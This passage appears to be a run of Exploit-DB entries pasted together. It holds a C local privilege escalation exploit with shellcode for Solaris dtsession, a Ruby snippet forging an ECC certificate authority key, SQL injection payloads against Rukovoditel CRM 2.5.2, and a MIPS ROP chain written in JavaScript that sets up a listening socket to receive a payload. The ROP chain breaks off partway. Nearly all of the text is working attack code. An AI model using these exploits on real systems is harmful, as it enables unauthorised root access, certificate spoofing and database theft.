<procfs.h> #include <stdio.h> #include <stdlib.h> #include <strings.h> #include <unistd.h> #include <sys/stat.h> #include <sys/systeminfo.h> #include <sys/types.h> #define INFO1 "raptor_dtsession_ipa.c - CDE dtsession LPE for Solaris/Intel" #define INFO2 "Copyright (c) 2019-2020 Marco Ivaldi <[email protected]>" #define VULN "/usr/dt/bin/dtsession" // the vulnerable program #define BUFSIZE 256 // size of the palette name #define PADDING 3 // padding in the palette name #define PAYSIZE 1024 // size of the payload #define OFFSET env_len / 2 // offset to the shellcode char sc[] = /* Solaris/x86 shellcode (8 + 8 + 27 = 43 bytes) */ /* double setuid() */ "\x31\xc0\x50\x50\xb0\x17\xcd\x91" "\x31\xc0\x50\x50\xb0\x17\xcd\x91" /* execve() */ "\x31\xc0\x50\x68/ksh\x68/bin" "\x89\xe3\x50\x53\x89\xe2\x50" "\x52\x53\xb0\x3b\x50\xcd\x91"; /* globals */ char *env[256]; int env_pos = 0, env_len = 0; /* prototypes */ int add_env(char *string); void check_zero(int addr, char *pattern); int search_ldso(char *sym); int search_rwx_mem(void); void set_val(char *buf, int pos, int val); /* * main() */ int main(int argc, char **argv) { char buf[BUFSIZE], payload[PAYSIZE]; char platform[256], release[256], display[256]; int i, payaddr; char *arg[2] = {"foo", NULL}; int sb = ((int)argv[0] | 0xfff); /* stack base */ int ret = search_ldso("strcpy"); /* or sprintf */ int rwx_mem = search_rwx_mem(); /* rwx memory */ FILE *fp; char palette_file[BUFSIZE + 18]; /* print exploit information */ fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); /* read command line */ if (argc != 2) { fprintf(stderr, "usage: %s xserver:display\n\n", argv[0]); exit(1); } sprintf(display, "DISPLAY=%s", argv[1]); /* prepare the payload (NOPs suck, but I'm too old for VOODOO stuff) */ memset(payload, '\x90', PAYSIZE); payload[PAYSIZE - 1] = 0x0; memcpy(&payload[PAYSIZE - sizeof(sc)], sc, sizeof(sc)); /* fill the envp, keeping padding */ add_env(payload); add_env(display); add_env("HOME=/tmp"); add_env(NULL); /* calculate the payload address */ payaddr = sb - OFFSET; /* prepare the evil palette name */ memset(buf, 'A', sizeof(buf)); buf[sizeof(buf) - 1] = 0x0; /* fill with function address in ld.so.1, saved eip, and arguments */ for (i = PADDING; i < BUFSIZE - 16; i += 4) { set_val(buf, i, ret); /* strcpy */ set_val(buf, i += 4, rwx_mem); /* saved eip */ set_val(buf, i += 4, rwx_mem); /* 1st argument */ set_val(buf, i += 4, payaddr); /* 2nd argument */ } /* prepare the evil .Xdefaults file */ fp = fopen("/tmp/.Xdefaults", "w"); if (!fp) { perror("error creating .Xdefaults file"); exit(1); } fprintf(fp, "*0*ColorPalette: %s\n", buf); // or *0*MonochromePalette fclose(fp); /* prepare the evil palette file (badchars currently not handled) */ mkdir("/tmp/.dt", 0755); mkdir("/tmp/.dt/palettes", 0755); sprintf(palette_file, "/tmp/.dt/palettes/%s", buf); fp = fopen(palette_file, "w"); if (!fp) { perror("error creating palette file"); exit(1); } fprintf(fp, "Black\n"); fclose(fp); /* print some output */ sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1); sysinfo(SI_RELEASE, release, sizeof(release) - 1); fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release); fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb); fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem); fprintf(stderr, "Using payload address\t: 0x%p\n", (void *)payaddr); fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret); /* run the vulnerable program */ execve(VULN, arg, env); perror("execve"); exit(0); } /* * add_env(): add a variable to envp and pad if needed */ int add_env(char *string) { int i; /* null termination */ if (!string) { env[env_pos] = NULL; return env_len; } /* add the variable to envp */ env[env_pos] = string; env_len += strlen(string) + 1; env_pos++; /* pad the envp using zeroes */ if ((strlen(string) + 1) % 4) for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) { env[env_pos] = string + strlen(string); env_len++; } return env_len; } /* * check_zero(): check an address for the presence of a 0x00 */ void check_zero(int addr, char *pattern) { if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) || !(addr & 0xff000000)) { fprintf(stderr, "Error: %s contains a 0x00!\n", pattern); exit(1); } } /* * search_ldso(): search for a symbol inside ld.so.1 */ int search_ldso(char *sym) { int addr; void *handle; Link_map *lm; /* open the executable object file */ if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) { perror("dlopen"); exit(1); } /* get dynamic load information */ if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) { perror("dlinfo"); exit(1); } /* search for the address of the symbol */ if ((addr = (int)dlsym(handle, sym)) == NULL) { fprintf(stderr, "sorry, function %s() not found\n", sym); exit(1); } /* close the executable object file */ dlclose(handle); check_zero(addr - 4, sym); return addr; } /* * search_rwx_mem(): search for an RWX memory segment valid for all * programs (typically, /usr/lib/ld.so.1) using the proc filesystem */ int search_rwx_mem(void) { int fd; char tmp[16]; prmap_t map; int addr = 0, addr_old; /* open the proc filesystem */ sprintf(tmp,"/proc/%d/map", (int)getpid()); if ((fd = open(tmp, O_RDONLY)) < 0) { fprintf(stderr, "can't open %s\n", tmp); exit(1); } /* search for the last RWX memory segment before stack (last - 1) */ while (read(fd, &map, sizeof(map))) if (map.pr_vaddr) if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) { addr_old = addr; addr = map.pr_vaddr; } close(fd); /* add 4 to the exact address NULL bytes */ if (!(addr_old & 0xff)) addr_old |= 0x04; if (!(addr_old & 0xff00)) addr_old |= 0x0400; return addr_old; } /* * set_val(): copy a dword inside a buffer (little endian) */ void set_val(char *buf, int pos, int val) { buf[pos] = (val & 0x000000ff); buf[pos + 1] = (val & 0x0000ff00) >> 8; buf[pos + 2] = (val & 0x00ff0000) >> 16; buf[pos + 3] = (val & 0xff000000) >> 24; }

# EDB Note ~ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47933.zip require 'openssl' raw = File.read "ca.crt" ca_cert = OpenSSL::X509::Certificate.new(raw) # Parse public key from CA ca_key = ca_cert.public_key if !(ca_key.instance_of? OpenSSL::PKey::EC) then puts "CA NOT ECC" puts "Type: " + key.inspect exit end # Set new group with fake generator G = Q ca_key.private_key = 1 group = ca_key.group group.set_generator(ca_key.public_key, group.order, group.cofactor) group.asn1_flag = OpenSSL::PKey::EC::EXPLICIT_CURVE ca_key.group = group puts ca_key.to_pem

# Exploit Title: Rukovoditel Project Management CRM 2.5.2 - 'filters' SQL Injection # Google Dork: N/A # Date: 2020-01-15 # Blog: https://fatihhcelik.blogspot.com/ # Exploit Author: Fatih Çelik # Vendor Homepage: https://www.rukovoditel.net/ # Software Link: https://sourceforge.net/projects/rukovoditel/ # Version: 2.5.2 # Tested on: Kali Linux # CVE : N/A # Request, POST /ruko/index.php?module=tools/users_login_log&action=listing HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/ruko/index.php?module=tools/users_login_log Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 125 Connection: close Cookie: cookie_test=please_accept_for_session; sid=3jnq6vg6ovl2cq0ojpsff4vaol; hblid=9P5zBGVwXwPEgj9L3m39N0U0I0A6O221; olfsk=olfsk14190220759411198; xoadmstyle=silver page=1&filters%5B0%5D%5Bname%5D=type&filters%5B0%5D%5Bvalue%5D=1&filters%5B1%5D%5Bname%5D=users_id&filters%5B1%5D%5Bvalue%5D= # PAYLOADS, # Parameter: filters[1][value] (POST) # Type: error-based # Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: page=1&filters[0][name]=type&filters[0][value]=0&filters[1][name]=users_id&filters[1][value]=1' AND (SELECT 6543 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(6543=6543,1))),0x7162787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ApLW # Type: time-based blind # Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=1&filters[0][name]=type&filters[0][value]=0&filters[1][name]=users_id&filters[1][value]=1' AND (SELECT 1479 FROM (SELECT(SLEEP(5)))WpOr)-- kARm # Parameter: filters[0][value] (POST) # Type: boolean-based blind # Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: page=1&filters[0][name]=type&filters[0][value]=-6686' OR 4511=4511#&filters[1][name]=users_id&filters[1][value]=1 # Type: error-based # Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: page=1&filters[0][name]=type&filters[0][value]=0' AND (SELECT 4167 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(4167=4167,1))),0x7162787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nQyo&filters[1][name]=users_id&filters[1][value]=1 # Type: time-based blind # Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=1&filters[0][name]=type&filters[0][value]=0' AND (SELECT 6373 FROM (SELECT(SLEEP(5)))ytRS)-- QpIm&filters[1][name]=users_id&filters[1][value]=1

// EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47936.zip function buf2hex(buffer) { // buffer is an ArrayBuffer return Array.prototype.map.call(new Uint8Array(buffer), x => ('00' + x.toString(16)).slice(-2)).join(''); } function insertAt(arr, index, toInsert) { for(let i = 0; i < toInsert.length; i++) { arr[i+index]= toInsert[i]; } } function testEqual(buf1, buf2) { if (buf1.byteLength != buf2.byteLength) return false; var dv1 = new Int8Array(buf1); var dv2 = new Int8Array(buf2); for (var i = 0 ; i != buf1.byteLength ; i++) { if (dv1[i] != dv2[i]) return false; } return true; } arr = new Uint8Array(0xd00); arr.fill(0x41) firstSp = 0x00 previousSp = firstSp sp = previousSp+0xa0 insertAt(arr, previousSp+0x84-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) insertAt(arr, previousSp+0x94-1, [0xf2, 0x80, 0x80, 0xa8, 0x64]) // 0x8080a864: addiu $a0, $zero, 2; lw $ra, 0x14($sp); lw $s0, 0x10($sp); move $v0, $zero; jr $ra; addiu $sp, $sp, 0x20; previousSp = sp sp = previousSp+0x20 insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0x3a, 0x1b, 0x54]) //0x803a1b54: addiu $a1, $zero, 1; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10; previousSp = sp sp = previousSp+0x10 insertAt(arr, previousSp-1, [0xc2, 0x80, 0x14, 0x27, 0x10]) //0x80142710: move $a2, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; previousSp = sp sp = previousSp+0x10 insertAt(arr, previousSp-1, [0xf2, 0x80, 0x8a, 0x89, 0x7c]) insertAt(arr, previousSp+0x8-1, [0xf2, 0x80, 0x80, 0xa5, 0x40]) //0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; previousSp = sp sp = previousSp+0x10 insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x4c, 0x27, 0x78]) //0x804c2778: addiu $v0, $v0, 0x4d90; lw $ra, 0x24($sp); lw $s0, 0x20($sp); jr $ra; addiu $sp, $sp, 0x30; previousSp = sp sp = previousSp+0x30 insertAt(arr, previousSp+0x24-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c]) //0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; //call Socket //0x80a05b20 socketAddr = [0xe2, 0x80, 0xa0, 0x5b, 0x20] previousSp = sp sp = previousSp+0x10 insertAt(arr, sp-1, socketAddr) //set s0 = socketAddr insertAt(arr, sp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) //set s5 insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) //0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; previousSp = sp sp = previousSp+0x80 insertAt(arr, previousSp+0x20-1, [0xe2, 0x80, 0x8e, 0x2a, 0x20]) //0x808e2a20: sw $v0, ($s0); move $v0, $s0; lw $ra, 0x14($sp); lw $s0, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20; //0x80a05a30; serverAddr = [0xe2, 0x80, 0xa0, 0x5a, 0x30]; previousSp = sp sp = previousSp+0x20 insertAt(arr, sp-1, serverAddr) //set s0 = serverAddr insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) //0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; previousSp = sp sp = previousSp + 0x80 insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x48, 0x71, 0x6c]) //0x8048716c: move $a0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; previousSp = sp sp = previousSp + 0x10 insertAt(arr, previousSp+0x8-1, [0xf2, 0x80, 0x87, 0x9e, 0x68]) //0x80879e68: move $a1, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; previousSp = sp sp = previousSp + 0x10 insertAt(arr, previousSp-1, [0xe2, 0x80, 0x83, 0xd9, 0xb8]) insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x7f, 0x18, 0x18]) //0x807f1818: addiu $a2, $zero, 0x20; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10; previousSp = sp sp = previousSp+0x10 insertAt(arr, previousSp-1, [0xf2, 0x80, 0x80, 0xa5, 0x40]) //0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; previousSp = sp sp = previousSp+0x10 insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x2e, 0x4f, 0x44]) //0x802e4f44: addiu $v0, $v0, 0x77c8; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; previousSp = sp sp = previousSp+0x10 insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c]) //0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; //call memset previousSp = sp sp = previousSp+0x10 insertAt(arr, sp, [0x41, 0x2, 0x5, 0x39]) //set s0 = port insertAt(arr, sp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) //set s5 insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) //0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; // previousSp = sp // sp = previousSp+0x10 // insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) // //0x80787f64: jalr $s5; nop; previousSp = sp sp = previousSp+0x80 insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40]) //0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; previousSp = sp sp = previousSp+0x10 insertAt(arr, sp-1, serverAddr) //set s0 = serverAddr insertAt(arr, sp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) //set s5 insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) //0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; previousSp = sp sp = previousSp+0x80 insertAt(arr, sp-1, socketAddr) insertAt(arr, previousSp+0x20-1, [0xe2, 0x80, 0x8e, 0x2a, 0x20]) //0x808e2a20: sw $v0, ($s0); move $v0, $s0; lw $ra, 0x14($sp); lw $s0, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20; //store port // previousSp = sp // sp = previousSp+0x20 // insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) // //0x80787f64: jalr $s5; nop; socketAddrM4 = [0xe2, 0x80, 0xa0, 0x5b, 0x1c] previousSp = sp sp = previousSp+0x20 insertAt(arr, sp-1, socketAddrM4) //set s0 = socketAddr - 4 insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) //0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; previousSp = sp sp = previousSp+0x80 insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x3d, 0x5b, 0x30]) //0x803d5b30: move $a0, $s0; move $v0, $zero; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; previousSp = sp sp = previousSp+0x10 insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd, 0x57, 0x6c]) //0x800d576c: lw $a0, 4($a0); lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10; previousSp = sp sp = previousSp+0x10 insertAt(arr, sp+0x4-1, serverAddr) //set s1 = server insertAt(arr, previousSp-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) //0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; previousSp = sp sp = previousSp+0x80 insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x5d, 0xdf, 0xb8]) //0x805ddfb8: move $a1, $s1; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; previousSp = sp sp = previousSp + 0x10 insertAt(arr, previousSp-1, [0xe2, 0x80, 0x8a, 0x62, 0x4c]) insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x7f, 0x18, 0x18]) //0x807f1818: addiu $a2, $zero, 0x20; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10; previousSp = sp sp = previousSp+0x10 insertAt(arr, previousSp-1, [0xf2, 0x80, 0x80, 0xa5, 0x40]) //0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; previousSp = sp sp = previousSp+0x10 insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x2e, 0x4f, 0x44]) //0x802e4f44: addiu $v0, $v0, 0x77c8; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; previousSp = sp sp = previousSp+0x10 insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c]) //0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; //call bind previousSp = sp sp = previousSp+0x10 insertAt(arr, sp-1, socketAddrM4) //set s0 = socketAddr - 4 insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) //0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; previousSp = sp sp = previousSp+0x80 insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x3d, 0x5b, 0x30]) //0x803d5b30: move $a0, $s0; move $v0, $zero; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; previousSp = sp sp = previousSp+0x10 insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd, 0x57, 0x6c]) //0x800d576c: lw $a0, 4($a0); lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10; previousSp = sp sp = previousSp+0x10 insertAt(arr, previousSp-1, [0xc2, 0x80, 0x3a, 0x1b, 0x54]) //0x803a1b54: addiu $a1, $zero, 1; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10; previousSp = sp sp = previousSp+0x10 insertAt(arr, sp-1, [0xf2, 0x80, 0x8a, 0x91, 0x20]) //set s0 = listen - 0x insertAt(arr, previousSp-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) //0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; previousSp = sp sp = previousSp+0x80 insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40]) //0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; previousSp = sp sp = previousSp+0x10 insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x4c, 0x27, 0x78]) //0x804c2778: addiu $v0, $v0, 0x4d90; lw $ra, 0x24($sp); lw $s0, 0x20($sp); jr $ra; addiu $sp, $sp, 0x30; previousSp = sp sp = previousSp+0x30 insertAt(arr, previousSp+0x24-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c]) //0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; //call listen previousSp = sp sp = previousSp+0x10 insertAt(arr, sp-1, socketAddrM4) //set s0 = socketAddr - 4 insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) //0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; previousSp = sp sp = previousSp+0x80 insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x3d, 0x5b, 0x30]) //0x803d5b30: move $a0, $s0; move $v0, $zero; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; previousSp = sp sp = previousSp+0x10 insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd, 0x57, 0x6c]) //0x800d576c: lw $a0, 4($a0); lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10; previousSp = sp sp = previousSp+0x10 insertAt(arr, previousSp-1, [0xc2, 0x80, 0x8, 0x40, 0x8]) //0x80084008: move $a1, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; previousSp = sp sp = previousSp+0x10 insertAt(arr, sp-1, [0xe2, 0x80, 0x8a, 0xd8, 0x84]) //set s0 = accept insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x14, 0x27, 0x10]) //0x80142710: move $a2, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; previousSp = sp sp = previousSp+0x10 insertAt(arr, previousSp+0x8-1, [0xf2, 0x80, 0x80, 0xa5, 0x40]) //0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; previousSp = sp sp = previousSp+0x10 insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c]) //0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; //call accept //0x80a05b24 clientAddr = [0xe2, 0x80, 0xa0, 0x5b, 0x24] previousSp = sp sp = previousSp+0x10 insertAt(arr, sp-1, clientAddr) //set s0 = clientAddr insertAt(arr, sp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) //set s5 insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) //0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; previousSp = sp sp = previousSp+0x80 insertAt(arr, previousSp+0x20-1, [0xe2, 0x80, 0x8e, 0x2a, 0x20]) //0x808e2a20: sw $v0, ($s0); move $v0, $s0; lw $ra, 0x14($sp); lw $s0, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20; // previousSp = sp // sp = previousSp+0x20 // insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0x78, 0x7f, 0x64]) // //0x80787f64: jalr $s5; nop; clientAddrM4 = [0xe2, 0x80, 0xa0, 0x5b, 0x20] previousSp = sp sp = previousSp+0x20 insertAt(arr, sp-1, clientAddrM4) //set s0 = clientAddr - 4 insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) //0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; previousSp = sp sp = previousSp+0x80 insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x3d, 0x5b, 0x30]) //0x803d5b30: move $a0, $s0; move $v0, $zero; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; previousSp = sp sp = previousSp+0x10 insertAt(arr, previousSp+0x4-1, [0xc2, 0x80, 0xd, 0x57, 0x6c]) //0x800d576c: lw $a0, 4($a0); lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10; previousSp = sp sp = previousSp+0x10 insertAt(arr, previousSp-1, [0xc2, 0x80, 0x4c, 0x10, 0x38]) //0x804c1038: addiu $a2, $zero, 0x400; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; //0x80a05c30 payloadAddr = [0xe2, 0x80, 0xa0, 0x5c, 0x30] previousSp = sp sp = previousSp+0x10 insertAt(arr, sp+0x4-1, payloadAddr) //set s1 = payload insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) //0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; previousSp = sp sp = previousSp+0x80 insertAt(arr, previousSp+0x20-1, [0xc2, 0x80, 0x5d, 0xdf, 0xb8]) //0x805ddfb8: move $a1, $s1; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; previousSp = sp sp = previousSp+0x10 insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x46, 0x73, 0x68]) //0x80467368: move $a3, $zero; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; previousSp = sp sp = previousSp+0x10 insertAt(arr, sp-1, [0xf2, 0x80, 0x8a, 0x93, 0x3c]) //set s0 = recv - 0x insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) //0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; previousSp = sp sp = previousSp+0x80 insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40]) //0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; previousSp = sp sp = previousSp+0x10 insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x4c, 0x27, 0x78]) //0x804c2778: addiu $v0, $v0, 0x4d90; lw $ra, 0x24($sp); lw $s0, 0x20($sp); jr $ra; addiu $sp, $sp, 0x30; previousSp = sp sp = previousSp+0x30 insertAt(arr, previousSp+0x24-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c]) //0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; //call recv previousSp = sp sp = previousSp+0x10 insertAt(arr, previousSp+0x4-1, [0xf2, 0x80, 0x80, 0xa8, 0x64]) // 0x8080a864: addiu $a0, $zero, 2; lw $ra, 0x14($sp); lw $s0, 0x10($sp); move $v0, $zero; jr $ra; addiu $sp, $sp, 0x20; previousSp = sp sp = previousSp+0x20 insertAt(arr, previousSp+0x14-1, [0xc2, 0x80, 0x12, 0x3b, 0x7c]) //0x80123b7c: addiu $a0, $a0, 4; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10; previousSp = sp sp = previousSp+0x10 insertAt(arr, sp-1, [0xf2, 0x80, 0x8a, 0xab, 0x5c]) //set s0 = sleep insertAt(arr, previousSp-1, [0xc2, 0x80, 0xd0, 0xb9, 0xc]) //0x80d0b90c: lw $ra, 0x20($ra); lw $s0, 4($sp) ... lw $s7, 0x1c($sp); jr $ra; addiu $sp, $sp, 0x80; previousSp = sp sp = previousSp+0x80 insertAt(arr, previousSp+0x20-1, [0xf2, 0x80, 0x80, 0xa5, 0x40]) //0x8080a540: move $v0, $s0; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10; previousSp = sp sp = previousSp+0x10 insertAt(arr, previousSp+0x8-1, [0xc2, 0x80, 0x1a, 0x5f, 0x4c]) //0x801a5f4c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); 